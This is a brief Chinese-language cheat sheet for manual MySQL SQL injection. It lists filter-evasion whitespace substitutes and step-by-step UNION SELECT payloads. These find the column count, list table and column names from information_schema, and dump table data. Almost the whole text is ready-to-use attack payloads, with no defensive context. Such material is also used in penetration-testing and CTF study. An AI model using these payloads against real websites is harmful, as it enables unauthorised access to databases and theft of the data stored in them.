Mysql手工注射

Mysql手工注射

空格替代符：%20,%09,%0a,%0c,%0d,/**/

Union注射

1. 获得字段数

Order by 字段#,

Union select 1,2,3,…….#

1. 获得表名

①
Union select table_name,2,3…… from information_schema.columns where table_schema=database() group by table_name#

② Union select table_name,2,3…… from information_schema.tables where table_schema=database()#

1. 获得列名

Union select column_name,2,3….. from information_schema.columns where table_name=’表’#

1. 获得数据

Union select 字段,2,3…. From 表名#